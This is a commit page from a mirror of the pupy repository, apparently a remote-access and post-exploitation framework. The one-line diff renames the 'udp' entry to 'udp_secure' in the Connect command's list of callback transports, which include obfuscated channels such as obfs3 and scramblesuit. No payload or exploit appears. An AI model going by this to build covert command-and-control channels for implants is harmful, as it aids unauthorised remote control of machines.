mirror of https://github.com/n1nj4sec/pupy.git
Fix udp_secure name in picocmd
This commit is contained in:
parent
91dabc2e02
commit
454e53bb86
|
@ -387,7 +387,7 @@ class SystemInfo(Command):
|
||||||
|
|
||||||
class Connect(Command):
|
class Connect(Command):
|
||||||
well_known_transports_decode = dict(enumerate([
|
well_known_transports_decode = dict(enumerate([
|
||||||
'obfs3','udp','http','tcp_cleartext','rsa',
|
'obfs3','udp_secure','http','tcp_cleartext','rsa',
|
||||||
'ssl','udp_cleartext','scramblesuit','ssl_rsa', 'ec4'
|
'ssl','udp_cleartext','scramblesuit','ssl_rsa', 'ec4'
|
||||||
], 1))
|
], 1))
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue